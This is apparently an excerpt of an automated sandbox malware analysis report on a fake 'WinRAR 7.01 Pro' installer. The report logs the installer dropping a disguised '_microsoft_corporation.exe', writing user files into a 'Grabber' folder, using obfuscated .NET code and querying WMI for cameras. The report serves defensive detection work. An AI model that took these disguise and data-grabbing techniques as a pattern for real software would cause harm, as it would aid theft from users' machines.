          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
          Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile written: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeAutomated click: OK
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeAutomated click: OK
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: WinRAR 7.01 Pro.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: WinRAR 7.01 Pro.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: WinRAR 7.01 Pro.exeStatic file information: File size 4492800 > 1048576
          Source: WinRAR 7.01 Pro.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x444200
          Source: WinRAR 7.01 Pro.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: WinRAR 7.01 Pro.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: winload_prod.pdb source: Temp.txt.3.dr
          Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb. source: winrar_x64_701ar.exe, 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, winrar_x64_701ar.exe, 00000001.00000000.1732532054.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr
          Source: Binary string: ntkrnlmp.pdb source: Temp.txt.3.dr
          Source: Binary string: winload_prod.pdb\ source: Temp.txt.3.dr
          Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.3.dr
          Source: Binary string: _.pdb source: _microsoft_corporation.exe, 00000003.00000003.1786072465.00000000026BB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\AppData\Local\Temporary Projects\WinRAR 7.01 Pro\obj\x86\Debug\WinRAR 7.01 Pro.pdb source: WinRAR 7.01 Pro.exe
          Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar_x64_701ar.exe, 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, winrar_x64_701ar.exe, 00000001.00000000.1732532054.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmp, WinRAR 7.01 Pro.exe, winrar_x64_701ar.exe.0.dr

          Data Obfuscation

          barindex
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, pteXN7SPQvYX16605Cl.cs.Net Code: Type.GetTypeFromHandle(TGLuQFKv2vFBySV592Z.qqBCSd2atm(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(TGLuQFKv2vFBySV592Z.qqBCSd2atm(16777269)),Type.GetTypeFromHandle(TGLuQFKv2vFBySV592Z.qqBCSd2atm(16777262))})
          Source: WinRAR 7.01 Pro.exeStatic PE information: real checksum: 0x0 should be: 0x454dc7
          Source: _microsoft_corporation.exe.0.drStatic PE information: real checksum: 0x23bfb should be: 0x846fe
          Source: winrar_x64_701ar.exe.0.drStatic PE information: section name: .didat
          Source: winrar_x64_701ar.exe.0.drStatic PE information: section name: _RDATA
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, mMWHY4ZubZBi2xiXsXE.csHigh entropy of concatenated method names: 'fyJRqpSnlJ', 'GaxR56x8jr', 'YqmRdgpyfX', 'AWLRhmV4r1', 'jiqRBLhylY', 'Sm6Rnn1IGi', 'rSKR7XWOvi', 'l0GZc0wXjV', 'WkPRoKT498', 'kwtRCquTxq'
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, Gym7vFKz1tgEEwOYTpd.csHigh entropy of concatenated method names: 'G7WZXmK2Sg', 'pYIZRDZQWU', 'n1fZNcEXCG', 'R5XZL99WpL', 'oOgZJoxUhI', 'TvyZFbTiKB', 'RurZWbCvEI', 'pDFZMlkwGp', 'qkTZbOlFs0', 'y8HZTPvbVe'
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, zLnbI2STNAl5Fvt4s2O.csHigh entropy of concatenated method names: 'eXmSqB1CrO', 'rB2SntuPD0', 'O3xSEmNtwS', 'JLAS9olAO8', 'yJfS3jJTjT', 'TSBSDO8sJW', 'OG4SloEGK5', 'o8WSVKB7r8', 'XcvSGR6q2J', 'wb8Sy5wcjo'
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, pteXN7SPQvYX16605Cl.csHigh entropy of concatenated method names: 'XHU8ZUuCVqEUsoE43rl', 'KlJwkfuYF7YAMg8nSC0', 'kw4KsaLuMs', 'qGKbBoukKyF1o8uregI', 'H9legvu3CGfgKqP4imH', 'XAomIIuH7BLVmPmd2cI', 'lO1uChuwv8aZMyAn7RE', 'AfSrQPuDmcWT5rh7Ffm', 'C6ZTQnulcKESS925Cn3', 'Cdl3JAug7nRTPeX9TJ1'
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, ecVo2lNnCTMA9nf0dn.csHigh entropy of concatenated method names: 'jiy3dhpiZ', 'iDPHDD3it', 'n8NweciPk', 'FwbVDpZIE', 'k6v4WWg8t', 'uxScXX8SR', 'BKNQWWkXI', 'OumU9MyFt', 'Wtyjma9A9', 'YNbO47Y5f'
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, Mv3iW76cioOfWMJS7a2.csHigh entropy of concatenated method names: 'adbphhCUBl', 'y9jpBYmvdc', 'ilfCKOT4keKJ2pWsKRF', 'EFWLHDTxAVfLEE7xfNm', 'C3nJLaTG3mcq4PNLjy0', 'QjwTy4TconTGIHOYAYA', 'FFwHLnTyEvncRPpHe8B', 'i0L3F1TQQ8cCZUErwAi', 'i2m6yIiuBq', 'w8B6QDDBdU'
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, DbH4j6pwrPw3CdLCllZ.csHigh entropy of concatenated method names: 'j6cplFGl1Q', 'Wt6pgegOSa', 'libp4Kl6lc', 'yftpcf76JE', 'znbpjK3CID', 'xYupf3Ubvw', 'xhVpPve6Ob', 'K6NS6NvaHK', 'pOUSZSB1Sn', 'WA0Si3NTLu'
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, fbxvKo6qdIcSHi0cFDA.csHigh entropy of concatenated method names: 'b5m6CAW8fm', 'XfO69n4qh7', 'Equals', 'GetHashCode', 'k8B6khmD3p', 'ToString', 'cnsvFKTnb76sG3mdEk6', 'P2eEbyT7dPyYkrWUw4c', 'sC4i2xThYBTPAIupjWA', 'UHpGS7TBhVpueQZHhMo'
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile created: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeJump to dropped file
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile created: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeJump to dropped file
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
